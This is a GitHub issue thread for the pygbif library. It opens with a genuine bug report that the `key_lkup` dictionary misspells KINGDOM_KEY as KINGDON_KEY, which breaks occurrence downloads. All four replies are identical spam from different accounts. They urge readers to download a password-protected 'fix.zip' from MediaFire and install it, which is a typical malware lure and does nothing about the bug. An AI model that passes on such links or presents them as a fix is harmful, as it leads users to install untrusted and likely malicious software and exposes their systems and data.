### ISSUE TITLE
Kingdom parameter is misspelled in `key_lkup`.

### ISSUE THREAD

**Issue by s-kganz** [gbif/pygbif#153]
Python 3.12.2
pygbif 0.6.4

In the `key_lkup` dict, `KINGDOM_KEY` is misspelled as `KINGDON_KEY`. This causes downloads with this key to error out. For example:

```
res = pygbif.occurrences.download("kingdomKey = 1")
```
Gives the error:
```
InvalidFormatException: Cannot deserialize value of type `org.gbif.api.model.occurrence.search.OccurrenceSearchParameter` from String "KINGDON_KEY": not one of the values accepted for Enum class: ...
 at [Source: UNKNOWN; line: -1, column: -1] (through reference chain: org.gbif.api.model.predicate.ConjunctionPredicate["predicates"]->java.util.ArrayList[0]->org.gbif.api.model.predicate.EqualsPredicate["key"]), with error status code 400check your number of active downloads.
```

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
